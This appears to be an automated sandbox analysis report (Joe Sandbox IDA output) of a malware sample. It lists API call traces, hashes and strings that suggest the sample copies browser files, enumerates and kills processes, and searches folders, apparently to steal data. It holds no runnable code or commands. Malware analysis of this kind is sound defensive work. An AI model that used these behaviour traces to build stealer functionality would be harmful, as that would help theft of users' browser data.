                                          • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                          • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                          • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DA548
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 022DA666
                                          • lstrlen.KERNEL32(00000000), ref: 022DA923
                                            • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                            • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                          • DeleteFileA.KERNEL32(00000000), ref: 022DA9AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                          • String ID:
                                          • API String ID: 257331557-0
                                          • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                          • Instruction ID: b6c79350879f92eb4bb8617f3476c8bb7e2aa6d8e1f8e73475853970a2f51dcd
                                          • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                          • Instruction Fuzzy Hash: 75E1BD729203189BCF19EBE4DD91DEEB33AAF64300F908159E157B2194EF346A48DF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                          • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                          • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                          • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD6E8
                                          • lstrlen.KERNEL32(00000000), ref: 022DD8FF
                                          • lstrlen.KERNEL32(00000000), ref: 022DD913
                                          • DeleteFileA.KERNEL32(00000000), ref: 022DD992
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                          • Instruction ID: 1b38d02df0154e398d0f8ec03b1e638ba83fe65b8f900dc65c0bee5badce6b20
                                          • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                          • Instruction Fuzzy Hash: FD91CB72920318ABCF18EBE4DD95DFE733AAF64300F904169E507A6194EF346A48DF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00948EF0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                          • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                          • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                          • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                            • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                            • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                            • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DDA68
                                          • lstrlen.KERNEL32(00000000), ref: 022DDC06
                                          • lstrlen.KERNEL32(00000000), ref: 022DDC1A
                                          • DeleteFileA.KERNEL32(00000000), ref: 022DDC99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID:
                                          • API String ID: 211194620-0
                                          • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                          • Instruction ID: 626f399f4d31656a7ebd68aae58d7b6b7cbd2d2cd3e1c2ec287d66d2709a4b82
                                          • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                          • Instruction Fuzzy Hash: 8F81CA72920318ABCF08EBE4DD95DEE733AAF64300F90456DE107A6194EF346A48DF61
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                            • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                          • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                          • API String ID: 998311485-3310892237
                                          • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                          • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                          • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                          • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                          APIs
                                          • memset.MSVCRT ref: 004194EB
                                            • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                            • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                            • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                          • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                          • String ID:
                                          • API String ID: 396451647-0
                                          • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                          • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                          • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                          • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                          APIs
                                          • memset.MSVCRT ref: 022E9752
                                            • Part of subcall function 022E8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022E9785,00000000), ref: 022E8FC2
                                            • Part of subcall function 022E8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E8FC9
                                            • Part of subcall function 022E8FB7: wsprintfW.USER32 ref: 022E8FDF
                                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022E9812
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 022E9830
                                          • CloseHandle.KERNEL32(00000000), ref: 022E983D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                          • String ID:
                                          • API String ID: 3729781310-0
                                          • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                          • Instruction ID: 1966fd507f57be01be1918eb8ca97169c2c0f1f91db8edbb69edd4c07ebe01c6
                                          • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                          • Instruction Fuzzy Hash: 843148B5E10248AFDF14DFE0CC49BEDB779EB45300F904419E506AA288DB786A88DF52
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                          • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                          • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • CloseHandle.KERNEL32(?), ref: 00418761
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                          • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                          • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                          • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                          APIs
                                            • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022E8931
                                          • Process32First.KERNEL32(?,00000128), ref: 022E8945
                                          • Process32Next.KERNEL32(?,00000128), ref: 022E895A
                                            • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                            • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                            • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                            • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                          • CloseHandle.KERNEL32(?), ref: 022E89C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                          • Instruction ID: 2b16b41d357271d2a048d5525aa5b60bff6fcd18246f052aa8a17739eb6b0277
                                          • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                          • Instruction Fuzzy Hash: 07318C71911318EBCF24DF94CD84FEEB379EB55700F504199A10AA22A4DB346E84CFA1
                                          APIs
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                          • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                          • lstrcatA.KERNEL32(?,00978578), ref: 00414FAB
                                          • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                          • String ID:
                                          • API String ID: 2667927680-0
                                          • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                          • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                          • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                          • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                          • wsprintfA.USER32 ref: 00418850
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocProcesslstrcpywsprintf
                                          • String ID: %dx%d
                                          • API String ID: 2716131235-2206825331
                                          • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                          • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                          • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22d0000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID:
                                          • API String ID: 3407564107-0
                                          • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                          • Instruction ID: dada6b9641bc4c403908fecdb169cc63010fb239e5ee0ba82f92f2f6832552a2
                                          • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                          • Instruction Fuzzy Hash: A41149B4910209EFCF04DFE4D948AEDBB75FF04305F408469E80AA6250E7705B14DF65
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                          • wsprintfA.USER32 ref: 004179F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 1243822799-0
                                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                          • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                          APIs
